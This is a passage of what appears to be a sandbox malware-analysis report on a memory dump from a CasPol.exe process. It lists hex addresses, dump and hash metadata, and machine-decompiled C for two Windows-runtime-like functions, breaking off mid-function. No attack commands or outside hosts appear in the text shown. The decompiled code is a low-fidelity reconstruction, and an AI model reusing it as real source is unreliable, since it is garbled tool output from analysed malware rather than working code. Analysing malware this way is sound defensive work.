                                                                                                                                                                                                                                                                                                0x01784824
                                                                                                                                                                                                                                                                                                0x0178482a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784835
                                                                                                                                                                                                                                                                                                0x0178483a
                                                                                                                                                                                                                                                                                                0x0178483d
                                                                                                                                                                                                                                                                                                0x0178483f
                                                                                                                                                                                                                                                                                                0x01784842
                                                                                                                                                                                                                                                                                                0x01784842
                                                                                                                                                                                                                                                                                                0x01784842
                                                                                                                                                                                                                                                                                                0x01784846
                                                                                                                                                                                                                                                                                                0x0178484c
                                                                                                                                                                                                                                                                                                0x0178484e
                                                                                                                                                                                                                                                                                                0x01784851
                                                                                                                                                                                                                                                                                                0x01784851
                                                                                                                                                                                                                                                                                                0x01784853
                                                                                                                                                                                                                                                                                                0x01784854
                                                                                                                                                                                                                                                                                                0x01784854
                                                                                                                                                                                                                                                                                                0x01784858
                                                                                                                                                                                                                                                                                                0x0178485a
                                                                                                                                                                                                                                                                                                0x0178485a
                                                                                                                                                                                                                                                                                                0x0178485d
                                                                                                                                                                                                                                                                                                0x0178485f
                                                                                                                                                                                                                                                                                                0x01784861
                                                                                                                                                                                                                                                                                                0x01784861
                                                                                                                                                                                                                                                                                                0x01784866
                                                                                                                                                                                                                                                                                                0x0178486b
                                                                                                                                                                                                                                                                                                0x0178486e
                                                                                                                                                                                                                                                                                                0x01784871
                                                                                                                                                                                                                                                                                                0x01784876
                                                                                                                                                                                                                                                                                                0x01784876
                                                                                                                                                                                                                                                                                                0x01784878
                                                                                                                                                                                                                                                                                                0x0178487b
                                                                                                                                                                                                                                                                                                0x01784884
                                                                                                                                                                                                                                                                                                0x01784884
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178487d
                                                                                                                                                                                                                                                                                                0x0178487d
                                                                                                                                                                                                                                                                                                0x01784882
                                                                                                                                                                                                                                                                                                0x01784889
                                                                                                                                                                                                                                                                                                0x01784889
                                                                                                                                                                                                                                                                                                0x0178488f
                                                                                                                                                                                                                                                                                                0x01784891
                                                                                                                                                                                                                                                                                                0x017848e0
                                                                                                                                                                                                                                                                                                0x017848e2
                                                                                                                                                                                                                                                                                                0x017848e4
                                                                                                                                                                                                                                                                                                0x017848e4
                                                                                                                                                                                                                                                                                                0x017848e7
                                                                                                                                                                                                                                                                                                0x017848e7
                                                                                                                                                                                                                                                                                                0x017848ed
                                                                                                                                                                                                                                                                                                0x017848f4
                                                                                                                                                                                                                                                                                                0x017848f6
                                                                                                                                                                                                                                                                                                0x01784951
                                                                                                                                                                                                                                                                                                0x01784951
                                                                                                                                                                                                                                                                                                0x01784953
                                                                                                                                                                                                                                                                                                0x01784953
                                                                                                                                                                                                                                                                                                0x01784956
                                                                                                                                                                                                                                                                                                0x01784956
                                                                                                                                                                                                                                                                                                0x01784958
                                                                                                                                                                                                                                                                                                0x01784959
                                                                                                                                                                                                                                                                                                0x01784959
                                                                                                                                                                                                                                                                                                0x0178495d
                                                                                                                                                                                                                                                                                                0x0178495d
                                                                                                                                                                                                                                                                                                0x0178495f
                                                                                                                                                                                                                                                                                                0x0178495f
                                                                                                                                                                                                                                                                                                0x01784965
                                                                                                                                                                                                                                                                                                0x01784969
                                                                                                                                                                                                                                                                                                0x017849ba
                                                                                                                                                                                                                                                                                                0x017849ba
                                                                                                                                                                                                                                                                                                0x017849c1
                                                                                                                                                                                                                                                                                                0x017849c5
                                                                                                                                                                                                                                                                                                0x017849cc
                                                                                                                                                                                                                                                                                                0x017849d4
                                                                                                                                                                                                                                                                                                0x017849d7
                                                                                                                                                                                                                                                                                                0x017849da
                                                                                                                                                                                                                                                                                                0x017849e4
                                                                                                                                                                                                                                                                                                0x017849e5
                                                                                                                                                                                                                                                                                                0x017849f3
                                                                                                                                                                                                                                                                                                0x01784a02
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784a02
                                                                                                                                                                                                                                                                                                0x01784972
                                                                                                                                                                                                                                                                                                0x01784974
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784976
                                                                                                                                                                                                                                                                                                0x01784979
                                                                                                                                                                                                                                                                                                0x01784982
                                                                                                                                                                                                                                                                                                0x01784983
                                                                                                                                                                                                                                                                                                0x01784984
                                                                                                                                                                                                                                                                                                0x0178498b
                                                                                                                                                                                                                                                                                                0x0178498d
                                                                                                                                                                                                                                                                                                0x01784991
                                                                                                                                                                                                                                                                                                0x01784993
                                                                                                                                                                                                                                                                                                0x01784999
                                                                                                                                                                                                                                                                                                0x0178499d
                                                                                                                                                                                                                                                                                                0x017849a2
                                                                                                                                                                                                                                                                                                0x017849a2
                                                                                                                                                                                                                                                                                                0x017849a2
                                                                                                                                                                                                                                                                                                0x01784999
                                                                                                                                                                                                                                                                                                0x017849ac
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017849b3
                                                                                                                                                                                                                                                                                                0x017848f8
                                                                                                                                                                                                                                                                                                0x017848fe
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017848fe
                                                                                                                                                                                                                                                                                                0x01784895
                                                                                                                                                                                                                                                                                                0x0178489c
                                                                                                                                                                                                                                                                                                0x017848ad
                                                                                                                                                                                                                                                                                                0x017848b2
                                                                                                                                                                                                                                                                                                0x017848b5
                                                                                                                                                                                                                                                                                                0x017848b7
                                                                                                                                                                                                                                                                                                0x017848ba
                                                                                                                                                                                                                                                                                                0x017848bc
                                                                                                                                                                                                                                                                                                0x017848c6
                                                                                                                                                                                                                                                                                                0x017848c6
                                                                                                                                                                                                                                                                                                0x017848cb
                                                                                                                                                                                                                                                                                                0x017848d1
                                                                                                                                                                                                                                                                                                0x017848d4
                                                                                                                                                                                                                                                                                                0x017848d8
                                                                                                                                                                                                                                                                                                0x017848d8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017848d8
                                                                                                                                                                                                                                                                                                0x017848be
                                                                                                                                                                                                                                                                                                0x017848c0
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017848c2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017848c4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784882
                                                                                                                                                                                                                                                                                                0x0178487b
                                                                                                                                                                                                                                                                                                0x01784904
                                                                                                                                                                                                                                                                                                0x01784906
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784908
                                                                                                                                                                                                                                                                                                0x0178490e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784910
                                                                                                                                                                                                                                                                                                0x01784917
                                                                                                                                                                                                                                                                                                0x01784917
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01784917
                                                                                                                                                                                                                                                                                                0x0172b1ba
                                                                                                                                                                                                                                                                                                0x017847f9
                                                                                                                                                                                                                                                                                                0x017847fc
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017847fc
                                                                                                                                                                                                                                                                                                0x0172b1c0
                                                                                                                                                                                                                                                                                                0x0172b1c0
                                                                                                                                                                                                                                                                                                0x0172b1c3
                                                                                                                                                                                                                                                                                                0x0172b1cb
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _vswprintf_s
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 677850445-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a5388a0823d89b45c5ee1d2dd277e62af156f1b41800fd95e16d0107b933913a
                                                                                                                                                                                                                                                                                                • Instruction ID: 1811a8d8abe3e04d42206c23be9e9fa596f855c2d5f24ec1a5da67c395cd7d4f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5388a0823d89b45c5ee1d2dd277e62af156f1b41800fd95e16d0107b933913a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8851E471D5026A8FDF31EF68C844BAEFBB0BF04710F1141ADD85AAB282D7B44941CB91
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0174B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                                                                			E0174B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x181d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01747D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							L017F8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L01769E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L0176B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L0176CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01747D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L017F8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L0176AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1818628; // 0x0
								_v68 = _t77;
								_t78 =  *0x181862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1818628; // 0x0
							_t116 =  *0x181862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                                                                                                                                                                                                0x0174b94c
                                                                                                                                                                                                                                                                                                0x0174b956
                                                                                                                                                                                                                                                                                                0x0174b95c
                                                                                                                                                                                                                                                                                                0x0174b95e
                                                                                                                                                                                                                                                                                                0x0174b964
                                                                                                                                                                                                                                                                                                0x0174b969
                                                                                                                                                                                                                                                                                                0x0174b96d
                                                                                                                                                                                                                                                                                                0x0174b96d
                                                                                                                                                                                                                                                                                                0x0174b970
                                                                                                                                                                                                                                                                                                0x0174b974
                                                                                                                                                                                                                                                                                                0x0174b97a
                                                                                                                                                                                                                                                                                                0x0174badf
                                                                                                                                                                                                                                                                                                0x0174badf
                                                                                                                                                                                                                                                                                                0x0174bae2
                                                                                                                                                                                                                                                                                                0x0174bae4
                                                                                                                                                                                                                                                                                                0x0174bae6
                                                                                                                                                                                                                                                                                                0x0174baf0
                                                                                                                                                                                                                                                                                                0x01792cb8
                                                                                                                                                                                                                                                                                                0x0174baf6
                                                                                                                                                                                                                                                                                                0x0174baf6
                                                                                                                                                                                                                                                                                                0x0174baf6
                                                                                                                                                                                                                                                                                                0x0174bafd
                                                                                                                                                                                                                                                                                                0x0174bb1f
                                                                                                                                                                                                                                                                                                0x0174bb1f
                                                                                                                                                                                                                                                                                                0x0174baff
                                                                                                                                                                                                                                                                                                0x0174bb00
                                                                                                                                                                                                                                                                                                0x0174bb00
                                                                                                                                                                                                                                                                                                0x0174bb03
                                                                                                                                                                                                                                                                                                0x0174bb03
                                                                                                                                                                                                                                                                                                0x0174bacb
                                                                                                                                                                                                                                                                                                0x0174bacf
                                                                                                                                                                                                                                                                                                0x0174bad0
                                                                                                                                                                                                                                                                                                0x0174bad1
                                                                                                                                                                                                                                                                                                0x0174badc
                                                                                                                                                                                                                                                                                                0x0174badc
                                                                                                                                                                                                                                                                                                0x0174b980
                                                                                                                                                                                                                                                                                                0x0174b980
                                                                                                                                                                                                                                                                                                0x0174b988
                                                                                                                                                                                                                                                                                                0x0174b98b
                                                                                                                                                                                                                                                                                                0x0174b98d
                                                                                                                                                                                                                                                                                                0x0174b990
                                                                                                                                                                                                                                                                                                0x0174b993
                                                                                                                                                                                                                                                                                                0x0174b999
                                                                                                                                                                                                                                                                                                0x0174b99b
                                                                                                                                                                                                                                                                                                0x0174b9a1
                                                                                                                                                                                                                                                                                                0x0174b9a5
                                                                                                                                                                                                                                                                                                0x0174b9aa
                                                                                                                                                                                                                                                                                                0x0174b9b0
                                                                                                                                                                                                                                                                                                0x0174b9bb
                                                                                                                                                                                                                                                                                                0x0174b9c0
                                                                                                                                                                                                                                                                                                0x0174b9c3
                                                                                                                                                                                                                                                                                                0x0174b9ca
                                                                                                                                                                                                                                                                                                0x0174b9cc
                                                                                                                                                                                                                                                                                                0x0174b9cf
                                                                                                                                                                                                                                                                                                0x0174b9d3
                                                                                                                                                                                                                                                                                                0x0174b9d7
                                                                                                                                                                                                                                                                                                0x0174ba94
                                                                                                                                                                                                                                                                                                0x0174ba94
                                                                                                                                                                                                                                                                                                0x0174ba98
                                                                                                                                                                                                                                                                                                0x0174baa3
                                                                                                                                                                                                                                                                                                0x01792ccb
                                                                                                                                                                                                                                                                                                0x0174baa9
                                                                                                                                                                                                                                                                                                0x0174baa9
                                                                                                                                                                                                                                                                                                0x0174baa9
                                                                                                                                                                                                                                                                                                0x0174bab1
                                                                                                                                                                                                                                                                                                0x01792cd5
                                                                                                                                                                                                                                                                                                0x01792cdd
                                                                                                                                                                                                                                                                                                0x01792cdd
                                                                                                                                                                                                                                                                                                0x0174babb
                                                                                                                                                                                                                                                                                                0x0174babc
                                                                                                                                                                                                                                                                                                0x0174bac2
                                                                                                                                                                                                                                                                                                0x0174bac3
                                                                                                                                                                                                                                                                                                0x0174bac3
                                                                                                                                                                                                                                                                                                0x0174bac6
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174b9dd
                                                                                                                                                                                                                                                                                                0x0174b9dd
                                                                                                                                                                                                                                                                                                0x0174b9e7
                                                                                                                                                                                                                                                                                                0x0174b9e7
                                                                                                                                                                                                                                                                                                0x0174b9ec
                                                                                                                                                                                                                                                                                                0x0174b9ec
                                                                                                                                                                                                                                                                                                0x0174b9f1
                                                                                                                                                                                                                                                                                                0x0174b9f5
                                                                                                                                                                                                                                                                                                0x0174b9fa
                                                                                                                                                                                                                                                                                                0x0174ba00
                                                                                                                                                                                                                                                                                                0x0174ba0c
                                                                                                                                                                                                                                                                                                0x0174ba10
                                                                                                                                                                                                                                                                                                0x0174ba10
                                                                                                                                                                                                                                                                                                0x0174ba12
                                                                                                                                                                                                                                                                                                0x0174ba18
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174bb26
                                                                                                                                                                                                                                                                                                0x0174bb26
                                                                                                                                                                                                                                                                                                0x0174ba1e
                                                                                                                                                                                                                                                                                                0x0174ba1e
                                                                                                                                                                                                                                                                                                0x0174ba23
                                                                                                                                                                                                                                                                                                0x0174ba25
                                                                                                                                                                                                                                                                                                0x0174ba2c
                                                                                                                                                                                                                                                                                                0x0174ba30
                                                                                                                                                                                                                                                                                                0x0174ba35
                                                                                                                                                                                                                                                                                                0x0174ba35
                                                                                                                                                                                                                                                                                                0x0174ba41
                                                                                                                                                                                                                                                                                                0x0174ba46
                                                                                                                                                                                                                                                                                                0x0174ba4c
                                                                                                                                                                                                                                                                                                0x0174ba50
                                                                                                                                                                                                                                                                                                0x0174ba54
                                                                                                                                                                                                                                                                                                0x0174ba6a
                                                                                                                                                                                                                                                                                                0x0174ba6e
                                                                                                                                                                                                                                                                                                0x0174ba70
                                                                                                                                                                                                                                                                                                0x0174ba74
                                                                                                                                                                                                                                                                                                0x0174ba78
                                                                                                                                                                                                                                                                                                0x0174ba7a
                                                                                                                                                                                                                                                                                                0x0174ba7c
                                                                                                                                                                                                                                                                                                0x0174ba8e
                                                                                                                                                                                                                                                                                                0x0174ba90
                                                                                                                                                                                                                                                                                                0x0174ba92
                                                                                                                                                                                                                                                                                                0x0174bb14
                                                                                                                                                                                                                                                                                                0x0174bb14
                                                                                                                                                                                                                                                                                                0x0174bb16
                                                                                                                                                                                                                                                                                                0x0174bb16
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174ba7c
                                                                                                                                                                                                                                                                                                0x0174bb0a
                                                                                                                                                                                                                                                                                                0x0174bb0d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174bb0f

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0174B9A5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 885266447-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 51696491c7097b5ae30c70bda5c605a3580586087bea52467c128d767f4380fe
                                                                                                                                                                                                                                                                                                • Instruction ID: 81c8c00892bdb960f099ba5b1eb1243e4874fbb1178bdf5aa9d2f9424b28f5f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51696491c7097b5ae30c70bda5c605a3580586087bea52467c128d767f4380fe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46514671A08341CFC720DF68C48492AFBF9FB88600F14896EEA9597359D730ED44CB92
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0175FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                                			E0175FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					L0173EEF0(0x1817b60);
					_t134 =  *0x1817b84; // 0x77e47b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1817b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1817b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = L01736D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														L017376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E017C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0172B150();
													}
													_t116 = L017C6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = L017375CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1818638; // 0x0
																	_t122 = L017338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			L017376E2(_t154);
																			goto L41;
																		}
																	} else {
																		L017376E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0175FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = L0175FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = L0175FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = L0175FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
